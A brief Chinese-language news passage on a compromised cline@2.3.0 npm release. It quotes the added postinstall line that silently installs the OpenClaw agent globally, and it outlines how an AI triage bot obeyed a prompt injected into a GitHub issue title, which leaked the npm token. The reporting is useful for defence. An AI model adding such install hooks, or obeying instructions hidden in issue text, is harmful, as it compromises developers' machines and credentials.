2026 年 2 月 17 日,有人在 npm 上发布了 cline@2.3.0,它与之前的版本基本上相同,唯一的区别是在 package.json 中加入了一行代码:"postinstall": "npm install -g openclaw@latest"。在之后的八小时内,所有安装或更新 Cline 的开发者都在未经许可的情况下,在计算机上全局安装了 OpenClaw——拥有完整系统访问权限的 AI 智能体。在该软件包被撤回之前,其下载量大约 4000 次。有意思的不是有效载荷,而是攻击者最初是如何获取到 npm 令牌的:将一个提示信息注入到 GitHub 问题标题中,AI 分类机器人读取了提示信息,将其解释为指令并执行。